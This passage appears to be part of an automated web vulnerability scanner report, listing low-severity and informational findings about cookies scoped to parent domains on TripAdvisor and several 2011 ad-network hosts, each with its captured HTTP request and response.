Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TACds=A.1.11539.1.2011-10-02; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.1*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.37*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*TRA.true; ServerPool=T; PassThruUrlArgs=%1%a_checkin.10%2F9%2F2011-qbos-a_adults.1-m11893-a_checkout.10%2F16%2F2011; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3B

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:37:31 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.getaroom%5C.com%2F*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*FS.37*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=A.2.12811.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 00:37:31 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2132

GIF89a..3.......w.f......DDE.........T.@...%%&...k.Y............TTU...sst...556.........`.Mccd............ddd.....s.................i..*..x..Z.qD%!..J_..b......D;%....Ym......sc<......5...........cV4I
...[SNIP]...
13.30. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tripadvisor.com
Path:   /img/cdsi/partner/tripAdvisorLogo-11007-0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/partner/tripAdvisorLogo-11007-0.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=635C14B6E6425746; TAUnique=%1%enc%3AApKTEaYI6mNVaPDGh0MhGA7WhW0nFykhd5HXfiPeVIfT5BsMYvhPlw%3D%3D; TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3; TACds=C.1.11539.1.2011-10-02; ServerPool=T; BEPIN=%1%132c736d105%3Bbak14b%3A7724%3Brev03b%3A8754%3Bbak02b%3A5465%3Bmed02b%3A8739%3B; CM=%1%sh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; TAReturnTo=%1%%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html; TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.2*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*FS.12*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*TRA.true*LL.971922*LD.60745*EWS.SmartDeals*FBH.2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:01:47 GMT
Server: Apache
expires: Mon, 03 Oct 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 02 Oct 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.ED9DF178C3DE113EA2B4AD10BB57FE25*SQ.3*MC.11893*LS.SmartDeals*GR.40*TCPAR.23*TBR.94*EXEX.44*ABTR.7*PPRP.12*PHTB.18*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*TFT.5*DF.0*FP.%2FSmartDeals%3Fcheckin%3D10%252F9%252F2011%26q%3Dbos%26args%3Dg1-m11893%26adults%3D1%26checkout%3D10%252F16%252F2011*RP.http%3A%2F%2Fwww%5C.hotwire%5C.com%2Fhotel%2Fdetails%5C.jsp%3FactionType%3D2%26inputId%3Dhotel-results%26searchId%3D6111849947%26selectedSolutionId%3D135420317134%26selectedPGoodId%3D236179701665*LR.http%3A%2F%2Fwww%5C.trip%5C.com%2Fhotels%5C.html*LP.%2FSmartDeals-g60745-Boston_Massachusetts-Hotel-Deals-a_checkin%5C.10%252F9%252F2011-qbos-a_adults%5C.1-m11893-a_checkout%5C.10%252F16%252F2011*FS.37*FBH.2*TRA.true*LL.971922*LD.60745*EWS.SmartDeals; Domain=.tripadvisor.com; Path=/
Set-Cookie: TACds=C.2.11007.0.2011-10-02; Domain=.tripadvisor.com; Expires=Fri, 02-Dec-2011 01:01:47 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 1211

GIF89ak...............q.?......trsQMO.....m....!..............|.....V...................**_O4..[.....}{gD...^cf.......TighZWX....~..i......EAA...=99_\_..............................................
...[SNIP]...
13.31. http://a.collective-media.net/adj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.guardian/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/cm.guardian/;sz=300x250;ord=$random$? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 416
Date: Sun, 02 Oct 2011 23:50:07 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Tue, 01-Nov-2011 23:50:07 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" lang
...[SNIP]...
13.32. http://a.collective-media.net/cmadj/cm.guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/cm.guardian/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.guardian/;sz=728x90;net=cm;ord=$random$;env=ifr;ord1=879803;cmpgurl=http%253A//www.guardian.co.uk/football/manchester-united? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 8096
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
13.33. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=41533529378 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Mon, 03 Oct 2011 00:15:06 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Sun, 01 Jan 2012 00:15:06 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:15:06 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...
13.34. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:12 GMT;
Content-Type: text/html
Location: /z/i.cid?c=395973&ev=1&page=Samplehomepage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>
13.35. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=3930898683&th=41533529378&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D26071%26s%3D26072&f=2&p=759881&a=1&rnd=755916 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Thu, 30-Sep-2021 00:13:42 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 435
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript">\r\n(function() {\r\n var tfimg1853089121 = new Image();\r\n tfimg1853089121.src = "http://d7.zedo.com/img/bh.gif?n=826&g=20&a=0&s=1&l=1&t=e&f=1&e=1";\
...[SNIP]...
13.36. http://a.tribalfusion.com/z/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=395973&ev=1&page=Samplehomepage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Wed, 29-Sep-2021 23:58:28 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;
13.37. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N270.N270.EMEA_StratDev/B3867719.15

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N270.N270.EMEA_StratDev/B3867719.15;u=pid=%pid!;,aid=%eaid!;,cid=%ecid!;;sz=1x1;ord=9364091? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://s0.2mdn.net/3268620/PID_1701515_parent_virgin_728.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 03 Oct 2011 00:39:59 GMT
Location: http://s0.2mdn.net/viewad/2195126/4-1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cadfdd83c0000d7||t=1317602399|et=730|cs=002213fd48bae36ca9fa1ef88a; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:39:59 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:39:59 GMT
Server: GFE/2.0
Content-Type: text/html

13.38. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6010.456584.XAXIS.COM/B5752701.15

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ib.adnxs.com/if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7472
Set-Cookie: id=ca5b4d83c000017||t=1317599554|et=730|cs=002213fd4884e3bed7d9e725fe; path=/; domain=.doubleclick.net; expires=Tue, 01 Oct 2013 23:52:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 01 Oct 2011 23:52:34 GMT
Date: Sun, 02 Oct 2011 23:52:34 GMT
Expires: Sun, 02 Oct 2011 23:52:34 GMT
Cache-Control: private

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
13.39. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.28

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N6054.Invitemedia.com/B5912738.28;sz=300x250;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjEsOgzAMBa.CvCYS8Qe_cJvQpCvUXVdV747NyjPS8_xIhI6lQWtbFxIOgZsywmoIYb7Awl5aNxQ9ey_gsZWJOcYb2qcb5WuO3XjztOxk0OLK_tQ08PO9rsA9sJqK._8GBj4bwg--&redirectURL=;ord=8ec82327-9a58-4baa-82d0-e8eddf84ae75? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7661
Set-Cookie: id=c28c1d83c000039||t=1317600006|et=730|cs=002213fd48e65c670a029fff3e; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:00:06 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:00:06 GMT
Date: Mon, 03 Oct 2011 00:00:06 GMT
Expires: Mon, 03 Oct 2011 00:00:06 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
13.40. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3285.advertisingcom/B2343920.49

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N3285.advertisingcom/B2343920.49;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000812164/mnum=0000915323/cstr=23819479=_4e88fd24,7015322258,812164%5E915323%5E1184%5E0,1_/xsxdata=$xsxdata/bnum=23819479/optn=64?trg=;ord=7015322258? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 4435
Set-Cookie: id=c15cfd83c000083||t=1317600590|et=730|cs=002213fd480e0d8c5cbf724fda; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 02 Oct 2011 00:09:50 GMT
Date: Mon, 03 Oct 2011 00:09:50 GMT
Expires: Mon, 03 Oct 2011 00:09:50 GMT
Cache-Control: private

document.write('<!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. -->\n<script src=\"http://s0.2mdn.net/879366/
...[SNIP]...
13.41. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4359.advertising.comOX2601/B5797640.2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N4359.advertising.comOX2601/B5797640.2;sz=160x600;click=http://r1-ads.ace.advertising.com/click/site=0000812162/mnum=0001072156/cstr=78334226=_4e88fd23,1577287805,812162%5E1072156%5E1184%5E0,1_/xsxdata=$XSXDATA/bnum=78334226/optn=64?trg=;ord=1577287805? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8491
Set-Cookie: id=ce2ced83c000015||t=1317600592|et=730|cs=002213fd48e3531570c028be26; path=/; domain=.doubleclick.net; expires=Wed, 02 Oct 2013 00:09:52 GMT
